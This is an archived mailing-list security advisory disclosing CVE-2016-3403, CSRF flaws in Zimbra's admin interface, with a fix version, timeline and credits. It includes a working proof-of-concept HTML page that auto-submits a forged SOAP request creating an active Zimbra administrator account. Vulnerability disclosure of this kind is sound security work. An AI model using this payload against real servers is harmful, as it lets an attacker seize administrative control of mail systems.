Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 11 Jan 2017 15:10:02 +0100
From: Sysdream Labs <labs@...dream.com>
To: oss-security@...ts.openwall.com
Cc: fulldisclosure@...lists.org
Subject: [CVE-2016-3403] [Zimbra] Multiple CSRF in Administration interface -
 all versions

# CVE-2016-3403: Multiple CSRF in Zimbra Administration interface

## Description

Multiple CSRF vulnerabilities have been found in the administration
interface of Zimbra, giving possibilities like adding, modifying and
removing admin accounts.

## Vulnerability

Every forms in the Administration part of Zimbra are vulnerable to CSRF
because of the lack of a CSRF token identifying a valid session. As a
consequence, requests can be forged and played arbitrarily.

**Access Vector**:   remote
**Security Risk**:   low
**Vulnerability**:   CWE-352
**CVSS Base score**: 5.8

## Proof of Concept

```html
<html>
<body>
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171:7071/service/admin/soap/CreateAccountRequest"
method="POST">
    <input name='<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="DTC"/><session xmlns=""
id="1337"/><format xmlns=""
type="js"/></context></soap:Header><soap:Body><CreateAccountRequest
xmlns="urn:zimbraAdmin"><name xmlns="">itworks@...ntu.fr</name><password
xmlns="">test1234</password><a xmlns=""
n="zimbraAccountStatus">active</a><a xmlns=""
n="displayName">ItWorks</a><a xmlns="" n'

        value='"sn">itworks</a><a xmlns=""
n="zimbraIsAdminAccount">TRUE</a></CreateAccountRequest></soap:Body></soap:Envelope>'/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```

## Solution

  * Upgrade to version 8.7

## Affected versions

 * All versions previous to 8.7

## Fixes

 * https://bugzilla.zimbra.com/show_bug.cgi?id=100885
 * https://bugzilla.zimbra.com/show_bug.cgi?id=100899

## Timeline (dd/mm/yyyy)

 * 24/02/2016: Issue reported to Zimbra
 * 24/02/2016: Issue aknwoledged
 * 20/06/2016: complete fixes released with version 8.7

## Credits

 * Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail
-dot- fr)
 * Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)
 
 




Download attachment "signature.asc" of type "application/pgp-signature" (820 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.